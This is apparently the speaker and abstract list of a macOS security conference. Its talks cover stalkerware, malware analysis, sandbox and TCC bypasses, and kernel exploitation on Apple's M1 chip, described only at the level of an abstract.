Presentations


Siri. Find My Ex (⏱️: 25 minutes)
👤 Eva Galperin (@evacide), Director of Cybersecurity EFF (📝: full bio)
Eva Galperin is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world. To that end, she has applied the combination of her political science and technical background to everything from organizing EFF's Tor Relay Challenge, to writing privacy and security training materials (including Surveillance Self Defense and the Digital First Aid Kit), and publishing research on malware in Syria, Vietnam, Kazakhstan. When she is not collecting new and exotic malware, she practices aerial circus arts and learning new languages.
Cybersecurity often focuses on the threats posed by malicious criminals or government surveillance, but for survivors of intimate partner abuse, surveillance begins at home. This talk will cover the frequently-overlooked threat posed by abusive partners, attackers who often have physical access to and considerable intimate knowledge of their victims.

Galperin will focus on the latest developments in intimate partner surveillance using Apple products, including stalkerware, abuse of location-sharing and other data-sharing settings, and Apple’s recently-debuted physical tracker, the AirTag.

Made In America: Analyzing US Spy Agencies' macOS Implants (⏱️: 50 minutes)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)
👤 Runa Sandvik (@runasand), Security Researcher (📝: full bio)
Patrick Wardle is the founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy.

Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.
Runa Sandvik works on digital security for journalists and other high-risk people. Her work builds upon experience from her time at The New York Times, Freedom of the Press Foundation, and The Tor Project.


Between 2015 and 2017, offensive cyber-espionage tools belonging to several US intelligence agencies were leaked. This gave security researchers a unique opportunity to gain unparalleled insight into the tradecraft, tools, and capabilities of these secretive organizations.

Amongst these leaks were several macOS implants. One, Green Lambert, was leveraged by the Vault7 group (CIA), while another, DoubleFantasy, belonged to the EquationGroup (NSA).

Interestingly these implants did not receive much public attention, nor were they fully analyzed. This talk aims to rectify this by providing a comprehensive analysis of both. Analyzing these old samples, like cyber paleontologists, allows us to better understand the capabilities of their highly sophisticated creators.

Moreover, the malware analysis approaches we present in this talk are applicable to the study of any macOS malware specimen.

All Your Macs Are Belong To Us: The Story of CVE-2021-30657 (⏱️: 50 minutes)
👤 Cedric Owens (@cedowens), Offensive Security Engineer (📝: full bio)
👤 Jaron Bradley (@jbradley89), macOS Detections, Team Lead at Jamf (📝: full bio)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)
Jaron has a background in incident response and threat hunting across Unix based platforms. He currently works as the macOS detections lead for Jamf Protect.

As an OG, he was the first ever speaker at the Objective By the Sea conferences and he makes sure to remind everyone about that each year. Although the conferences are always a blast, he primarily attends for the super ono Hawaiian food.
Cedric is currently a red teamer who came from a blue team background. His passion revolves around red teams and blue teams working closely together to improve each other's tradecraft. Cedric enjoys writing useful red team and blue team utilities and periodically writing posts that are of interest on his blog at https://medium.com/red-teaming-with-a-blue-team-mentaility.
Patrick Wardle is the founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy.

Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.



A recent vulnerability, CVE-2021-30657, neatly bypassed a myriad of foundational macOS security features such as File Quarantine, Gatekeeper, and Notarization. Armed with this capability attackers could (and were!) hacking macOS systems with a simple user (double)-click. Yikes!


In this joint presentation we'll first highlight the discovery of the flaw and how it could be deployed to unsuspecting Mac users. Following this, we'll dig deep into the bowels of macOS to uncover the root cause of the bug: a subtle logic flaw in the complex and undocumented policy subsystem.


Next, we’ll highlight the discovery of malware exploiting this bug in the wild, as an 0day. To wrap up, we’ll peek at Apple’s patch, as well as discuss novel methods of both detection and prevention.

iOS Reverse Engineering With Frida (⏱️: 50 minutes)
👤 Christine Fossaceca, Senior Mobile Security Researcher & Reverse Engineer at The MITRE Corporation (📝: full bio).
Christine Fossaceca is a senior mobile security researcher and reverse engineer at The MITRE Corporation. Christine is also a part of the @furiousMAC research team. She has experience with Android and iOS. An IDA Pro afficionado, Christine is learning to like Ghidra, too. She also enjoys using Frida to aid her in dynamic analysis, and tries not to let her dog distract her too much.
Are you interested in iOS RE but it seems too daunting to even know where to begin? This talk will show you how easy it is to get started in iOS RE with any PC/Mac, an iPhone, and Frida!

Frida is a dynamic code instrumentation framework that is an essential tool in an iOS reverse engineer's toolbelt. Using Javascript, Frida allows you to inject custom code into a native app on a multitude of platforms. And did I mention it is open source?

Becoming a Yogi on Mac ATT&CK with OceanLotus Postures (⏱️: 50 minutes)
👤 Cat Self (@coolestcatiknow), Lead Adversary Emulation Engineer at The MITRE Corporation (📝: full bio)
👤 Adam Pennington (@_whatshisface), ATT&CK Director at The MITRE Corporation (📝: full bio)
Cat Self is an Adversary Emulation Engineer at The MITRE Corporation and works as the macOS ATT&CK Lead, researching macOS specific malware, advanced persistent threat actors, and techniques.

Cat previously worked as an internal red team operator, threat hunter, and developer at Target Corporate. Cat is an Airborne Military Intelligence veteran with a passion for mentorship, researching all things Apple, and hiking mountains in foreign lands.
Adam Pennington leads ATT&CK at The MITRE Corporation and collected much of the intelligence leveraged in creating ATT&CK’s initial techniques. He has spent much of his 13 years with MITRE studying and preaching the use of deception for intelligence gathering.

Prior to joining MITRE, Adam was a researcher at Carnegie Mellon's Parallel Data Lab and earned his BS and MS degrees in Computer Science and Electrical and Computer Engineering as well as the 2017 Alumni Service Award from Carnegie Mellon University. Adam has presented and published in a number of venues including FIRST CTI, USENIX Security, DEF CON, and ACM Transactions on Information and System Security.


Maybe you've heard about this MITRE ATT&CK® thing, but it’s just for Windows, right? ATT&CK's free knowledge base of adversary behaviors focuses on the real-world tactics, techniques, and procedures seen in actual intrusions, and has quietly covered Macs since 2017.


Macs are a unique security space, and we’ll explore what’s unique about ATT&CK for macOS, and the work we’re doing to improve it in 2021.


Using OceanLotus's macOS activity as a use case, we’ll walk through how organizations can use ATT&CK as a focal point to improve their threat intelligence, detection analytics, adversary emulation and defensive planning.

The Wild World of macOS Installers (⏱️: 50 minutes)
👤 Tony Lambert (@ForensicITGuy), Intelligence Analyst Red Canary (📝: full bio)
Tony is a professional geek who loves to jump into all things related to detection and digital forensics. After working in enterprise IT administration and detection engineering for several years, he now applies his DFIR skills to research malware, detect malicious activity, and recommend pathways for remediation.

Tony is a natural teacher and regularly shares his findings and expertise through blogs, research reports, and presentations at conferences and events.
While malicious email attachments are the initial access mechanism of choice for other platforms, many macOS threats abuse software installers to subvert Apple's security controls and gain access. In some cases, adversaries even eschew including binary content in installation packages and just use the built-in installer structures to retrieve arbitrary content!

In this talk, I'll discuss installation methods that multiple threats have used, from suspected APTs to adware and proof-of-concept code. I'll cover package (PKG) installers with pre- and postinstall scripts, application bundles distributed in DMG files, and third-party library installation using tools such as Python's PIP utility. In addition to real-world examples documented in the wild, I'll also show the malware execution using data from endpoint detection and response (EDR) technology to provide ideas for effective analytics.

Mount(ain) of Bugs (⏱️: 50 minutes)
👤 Csaba Fitzl (@theevilbit), Content developer at Offensive Security (📝: full bio)
Csaba graduated in 2006 as a computer engineer. He worked for 6 years as a network engineer, troubleshooting and designing big networks. After that he worked for 8 years as a blue and red teamer focusing on network forensics, malware analysis, adversary simulation and defense bypasses. Currently he is working as a content developer at Offensive Security.

He gave talks and workshops on various international IT security conferences, including Hacktivity, hack.lu, Troopers, SecurityFest, DEFCON, NULLCON and Objective By The Sea.

In this talk we will dive into mount operation internals on macOS and discuss several vulnerabilities impacted the system.

In the first half we will introduce how mounting is happening, how the sandbox is tied to the mount operation. We will also discuss the diskarbitration service, which is also responsible some of the mounting which can be done by the user.

Next we will detail different bugs impacted macOS in the past, where mounting had a key role. These range from privilge esclaation to complete privacy (TCC) bypasses.

Lastly we will review how we can use the mount command for our own advantage when exploiting third party applications.

Pocket Litter - A Peek Inside Your Apple Wallet (⏱️: 25 minutes)
👤 Sarah Edwards (@iamevltwin), Senior Digital Forensics Researcher at Cellebrite (📝: full bio)
Sarah is a Senior Digital Forensics Researcher at Cellebrite working in DC metro area specializing in Mac and Mobile Forensics. She has worked with various federal law enforcement agencies and has performed a variety of investigations including computer intrusions, criminal, and counter-intelligence/terrorism/narcotics.

Sarah’s research interests include anything and everything Apple-related, mobile devices, digital profiling, and Mac and mobile device security. Sarah has presented at many industry security and forensic conferences and is the author/instructor of SANS FOR518 Mac Forensic Analysis and Incident Response.

General acceptance of Apple Wallet, Apple Pay, and the Apple Card has increased in recent years. New capabilities are introduced with every update which means more of your personal data is stored in your Wallet. An amazing amount of information is stored in application data, some of which is synced across devices.

This talk will explore the private details of your life that are stored in your Wallet such as your recent transactions, detailed locations items purchased, travel on transit systems and tickets and passes acquired. Like finding a wallet on the street, it can tell a story about its owner.

n-1 and n-2: Should we really trust in you? (⏱️: 25 minutes)
👤 Josh Long (@theJoshMeister), Chief Security Analyst, Intego (📝: full bio)
Joshua Long (@theJoshMeister) is the Chief Security Analyst at Intego. He is a renowned security researcher, writer, and public speaker, with more than 20 years of experience battling cyber threats. Josh has a master's degree in IT concentrating in Internet Security, and has taken doctorate-level coursework in Business Administration and Computer & Information Security.

Apple has publicly acknowledged Josh for discovering an Apple ID password validation vulnerability. Josh's security research has been featured by tech and mainstream press, including CBS News, CIO, CNET, Lifehacker, The Mac Security Blog, MacTech Magazine, Macworld, Naked Security, The Register, ZDNet, and more.

Apple has a de facto policy about operating system updates on the Mac: security issues get patched for the current and two previous major macOS releases. In other words, the latest major version of macOS (n) as well as last year's release (n-1) and the two-year-old release (n-2) ostensibly get the same security updates. This can be convenient because, in theory, it means that users can stay on an older macOS version for a couple years, for example if their favorite software isn't supported yet on the latest OS, or if the current macOS release won't run on their old Mac hardware.

But is it really true that, by virtue of still getting security updates, older versions of macOS are just as safe as the latest version? Few Mac users and admins are aware that Apple doesn't necessarily patch every security vulnerability in the two previous macOS versions. In this presentation we will seek to quantify, to the degree possible, exactly how safe or unsafe it is to stay on older versions of macOS, and whether or not you should upgrade quickly to each major new release. In our comprehensive analysis, we'll not only compare CVEs addressed—or not addressed—for proprietary and FLOSS components of each macOS version, but we'll also share insights from Mac vulnerability researchers, and with any luck, we'll see if we can learn anything from Apple itself on the subject.

Apple's Envy: Root once, bypass TCC (⏱️: 25 minutes)
👤 Andy Grant (@andywgrant), Head of Offensive Security at Zoom Video Communications, Inc. (📝: full bio)
Andy Grant is the Head of Offensive Security at Zoom. He has more than a decade of professional experience in offensive security, and two decades of involvement in computer security. His team at Zoom is responsible for finding security vulnerabilities in the company and its products, which involves conducting security assessments, performing vulnerability research, and engaging with third-party security vendors. He is also responsible for building out a dedicated red team and leading purple team exercises.

Prior to Zoom, Andy was a Technical Vice President for NCC Group and worked on a wide variety of projects over his twelve years with the company. He performed countless application assessments across many platforms and systems. He also conducted internal and external network penetration tests, architecture and design reviews, and threat modeling exercises. He worked with small tech start-ups, small and large software development groups, and large financial institutions. He has a B.S. in Computer Science and an Advanced Computer Security Certificate, both from Stanford University.

Have you gotten a remote foothold on macOS, even escalated to root, but still been frustrated by TCC? Yeah, me neither. But if you had, you’d want to see this talk!

I'll demonstrate a technique to grant arbitrary applications TCC rights, including Full Disk Access, from a remote compromise. I'll also share a lesser known resource for testing macOS techniques without owning a macOS device, for free.

Plug-n-Play: Using Native Code with Installer Plugins for Initial Access (⏱️: 25 minutes)
👤 Chris Ross (@xorrior), Offensive Security Engineer at Zoom Video Communications, Inc. (📝: full bio)
Chris Ross is an Offensive Security Engineer on the red team at Zoom. He works to build offensive tools and develop new attack techniques for offensive operations.

Chris has a specific interest in macOS post-exploitation toolsets and developing malware.

MacOS initial access techniques are somewhat limited for red teamers. Security features such as Gatekeeper, Notarization, and the application sandbox add more complexity to getting a foothold. Amongst all of the payload types for macOS, installer packages provide the most versatility for code execution techniques. Unfortunately, installer scripts and distribution XML in-line JavaScript code execution techniques leave command line artifacts and aren't ideal for stealthy initial access. However, installer plugins provide a neat way to execute objective-c code. Apple has changed the mechanics of how installer plugins are executed such that the host process for installer plugins is quickly killed after the installer process exits. This presents an interesting dilemma as attackers will need to find a way to extend the life of their malicious code once executed. In this talk, I'll:
  • Explain how installer plugins work
  • Demonstrate two different methods for code execution via native APIs on macOS
  • Explain these techniques and installer plugins stack up against the Endpoint Security Framework
  • Share the code with my fellow hackers!

FIDO on MacOS: How it works, Attack Vectors and Other Learnings (⏱️: 25 minutes)
👤 Joel Rennich, Director of Jamf Connect at Jamf (📝: full bio)
Joel Rennich is the director of Jamf's Mac authentication and account management solution, Jamf Connect. Joel joined Jamf as part of the company’s acquisition of NoMAD (later rebranded to Jamf Connect).

WebAuthn and FIDO are quickly becoming a strong authentication mechanism of choice for a lot of IdPs and their customers. In general this is a very good development as these technologies have strong support from a wide variety of hardware, operating systems and a growing number of websites. However, it’s also important to understand where the weak points are.

In this session we will cover some basics about why you should care about WebAuthn and FIDO on Apple devices, how it’s built into the OS through the browsers or via an external Security Key, possible attack vectors, and then some learnings for organizations around deploying these technologies. We’ll do some live demos as we go through this showing you the user experience and how potentially malicious code can wedge itself into the transaction.

Kernel Exploitation on Apple's M1 chip (⏱️: 25 minutes)
👤 08tc3wbb (@08tc3wbb), Bug Bounty Hunter and a Security Researcher at ZecOps (📝: full bio)
08tc3wbb is a Bug Bounty Hunter and a Security Researcher at ZecOps, investigating potential attacks and developing various exploits for macOS and iOS.

As the Mac product line gradually enters the M1 chip era, the macOS security of the arm64e architecture is beginning to approach iOS. The mitigations that only existed on iOS in the past are now also applicable to macOS. As well as... the vulnerabilities that only affected iOS in the past are now also brought into macOS. Lol.

AppleAVE2 (AVEVideoEncoder) is a graphics IOKit driver that runs in kernel space and exists only on iOS and M1 chip-based Macs. The complexity of the driver itself and the extensive use of user-kernel memory mapping make it a desirable target for kernel exploitation. I used it to develop kernel exploits for iOS 12 and iOS 13 Jailbreak. CVE-2019-8795, CVE-2020-9907, CVE-2020-9907b.

This talk will explain in detail how Apple "fixed" the AppleAVE2 driver and how we can exploit AppleAVE2 once again to achieve kernel r/w on M1 Macbook, at last I'll share some of my thoughts on post-exploitation.

Environmental Disaster: A LaunchServices Tale (⏱️: 25 minutes)
👤 Ron Waisberg (@epsilan), Product Security at Okta (📝: full bio)
Ron does product security at Okta during the day and tinkers with platform security at night. In his previous role at Trend Micro, you could find him tearing apart patches and writing n-day exploits. To forget about computers he likes to climb, hike, and enjoy a nice beer.

The safety and trust promised by the App Store is in large part due to mandatory sandboxing requirements. The required App Sandbox lets users install apps with abandon and without worry, keeping malicious ones contained. This talk will deep dive into CVE-2021-30677, a logic vulnerability in LaunchServices that allowed an attacker to escape the App Sandbox and bypass privacy protections despite the many new security mechanisms introduced in Big Sur and Catalina.

You'll learn how one deceptively simple issue can be exploited in multiple ways and hopefully have a laugh at the same time. We'll release a tool to help reverse the latest versions of macOS and extend an already great tool to help find & detect vulnerabilities like this one. Finally, we'll lay the groundwork for bugs to come and highlight an obvious but forgotten attack surface.

Anti-Analysis Logic of Arm Malware on macOS (⏱️: 25 minutes)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)

Apple's new M1 systems (aka Apple Silicon) offer a myriad of benefits ...for both macOS users, and well, to malware authors as well.

However, before analyzing malware targeting this platform, one must master various foundational topics such as understanding and reversing arm64 code.

In this talk, we'll cover such topics and then apply them in order to analyze the anti-analysis logic of the first malicious program compiled to natively target Apple Silicon.

Armed (ha!) with the information and analysis techniques presented in this talk, you'll leave well on the way to becoming a proficient macOS M1 malware analyst!

Mac detections by the numbers (⏱️: 25 minutes)
👤 Thomas Reed (@thomasareed), Director of Mac & Mobile at Malwarebytes (📝: full bio)
Thomas Reed has been using Macs since 1984. He is a self-taught security researcher and Director of Mac & Mobile at Malwarebytes.

In his spare time, he is an avid photographer.

Come hear about interesting pieces of Mac malware, and see data relating to their detections. In addition to discovering interesting malware behaviors, you'll learn things like which malware is most common, how malware is distributed globally, and interesting observations about malware artifacts. Discuss interesting behaviors of recent malware:
  • Silver Sparrow
  • XcodeSpy
  • ElectroRAT
  • XCSSET
  • ...and more
For each, look at detection data, focusing on what information is most interesting for that malware (eg, for Silver Sparrow, look at details about the infamous ._insu file).